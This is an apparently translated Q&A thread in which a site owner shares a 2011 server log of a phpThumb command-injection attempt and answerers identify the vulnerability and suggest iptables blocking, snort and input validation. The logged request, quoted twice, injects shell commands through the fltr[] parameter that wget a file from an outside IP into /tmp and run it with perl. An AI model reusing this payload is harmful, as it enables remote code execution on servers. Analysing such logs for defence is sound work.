我编写了一个错误日志脚本，用于记录所有输入和其他内容

Question

我从一个攻击者那里得到了错误，我相信..他们想要做什么以及如何阻止他们？日志如下：

Monday 26th of December 2011 12:10:18 PM
src=file.jpg&fltr[]=blur|
9%20-quality%20%2075%20interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 
91.121.133.22 
| 39757 
| /var/www/class.php 
| /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9

src =数组- phpThumbDebug =数组- fltr =9-

我已将区域分隔为新的行。其中大部分是输入，然后是服务器端口、它们的ip地址和它们访问的脚本。看起来他们肯定是想利用漏洞来访问命令行。但这并不是他们认为的脚本。

Answer 1

get服务器总是受到攻击。任何给定的攻击都是试图攻破特定的程序。如果你的软件写得很好，并验证了所有的输入，你的系统应该能够容忍这样的垃圾，并礼貌地忽略它。如果一天只发生3次，那就不像DOS攻击了。

Answer 2

在phpThumb的fltr[]参数中似乎存在利用命令注入的漏洞

http://www.securityfocus.com/bid/39605/exploit

http://www.juniper.net/security/auto/vulnerabilities/vuln39605.html

Answer 3

如果所有攻击都来自同一个IP地址，那么您可以使用iptables来阻止该IP访问您的服务器。您可以通过编写脚本让它临时或永久地执行此操作。此解决方案假定您对托管的服务器具有root/sudo访问权限。您还可以探索snort，它对于已知的(和常见的)利用有效负载和字符串非常有效。

最后，当涉及到防止常见的基于web的攻击时，没有什么比可靠的输入验证更好的了！